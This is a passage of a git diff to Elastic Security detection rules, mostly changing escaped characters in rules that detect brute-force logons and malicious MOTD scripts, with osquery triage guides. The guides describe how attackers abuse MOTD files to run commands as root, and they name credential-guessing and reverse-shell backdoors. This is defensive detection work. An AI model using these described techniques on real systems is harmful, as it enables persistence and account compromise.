 "query": "sequence by winlog.computer_name, source.ip with maxspan=5s\n [authentication where event.action == \"logon-failed\" and\n /* event 4625 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\" and\n\n /* noisy failure status codes often associated to authentication misconfiguration */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=5\n [authentication where event.action == \"logged-in\" and\n /* event 4624 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\"]\n",
 "references": [
 "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625"
@@ -67,7 +67,7 @@
 ],
 "risk_score": 47,
 "rule_id": "4e85dc8a-3e41-40d8-bc28-91af7ac6cf60",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -79,7 +79,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_7.json b/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_7.json
index 28d82a13225..7918f289694 100644
--- a/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_7.json
+++ b/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_7.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Multiple Logon Failure Followed by Logon Success", - "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure Followed by Logon Success\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address, followed by a successful logon, indicating that an attacker potentially successfully compromised the account.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', 
sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure from the same Source Address - 48b6edfc-079d-4907-b43c-baffa243270d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure Followed by Logon Success\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address, followed by a successful logon, indicating that an attacker potentially successfully compromised the account.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', 
sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure from the same Source Address - 48b6edfc-079d-4907-b43c-baffa243270d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "sequence by winlog.computer_name, source.ip with maxspan=5s\n [authentication where event.action == \"logon-failed\" and\n /* event 4625 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\" and\n\n /* noisy failure status codes often associated to authentication misconfiguration */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=5\n [authentication where event.action == \"logged-in\" and\n /* event 4624 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\"]\n",
 "references": [
 "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625"
@@ -67,7 +67,7 @@
 ],
 "risk_score": 47,
 "rule_id": "4e85dc8a-3e41-40d8-bc28-91af7ac6cf60",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -78,7 +78,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_8.json b/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_8.json
index bc376237cdc..de34977434b 100644
--- a/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_8.json
+++ b/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_8.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Multiple Logon Failure Followed by Logon Success", - "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure Followed by Logon Success\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address, followed by a successful logon, indicating that an attacker potentially successfully compromised the account.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', 
sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure from the same Source Address - 48b6edfc-079d-4907-b43c-baffa243270d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure Followed by Logon Success\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address, followed by a successful logon, indicating that an attacker potentially successfully compromised the account.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', 
sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure from the same Source Address - 48b6edfc-079d-4907-b43c-baffa243270d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "sequence by winlog.computer_name, source.ip with maxspan=5s\n [authentication where event.action == \"logon-failed\" and\n /* event 4625 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\" and\n\n /* noisy failure status codes often associated to authentication misconfiguration */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=5\n [authentication where event.action == \"logged-in\" and\n /* event 4624 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\"]\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625" 
@@ -67,7 +67,7 @@
 ],
 "risk_score": 47,
 "rule_id": "4e85dc8a-3e41-40d8-bc28-91af7ac6cf60",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -78,7 +78,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_1.json b/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_1.json
index f766789a4cf..a51689d52e9 100644
--- a/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_1.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_2.json b/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_2.json
index 377f3aeb3ce..cc536291188 100644
--- a/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_2.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_3.json b/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_3.json
index babde9b7245..18f08babc49 100644
--- a/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_3.json
@@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Process Spawned from MOTD Detected", - "note": "## Triage and analysis\n\n### Investigating Suspicious Process Spawned from MOTD Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Files in these directories will automatically run with root privileges when they are made executable.\n\nThis rule identifies the execution of potentially malicious processes from a MOTD script, which is not likely to occur as default benign behavior. \n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified from which the suspicious process was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services, and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Potential Persistence Through MOTD File Creation Detected - 96d11d31-9a79-480f-8401-da28b194608f\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore them to the original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process Spawned from MOTD Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Files in these directories will automatically run with root privileges when they are made executable.\n\nThis rule identifies the execution of potentially malicious processes from a MOTD script, which is not likely to occur as default benign behavior. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified from which the suspicious process was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. 
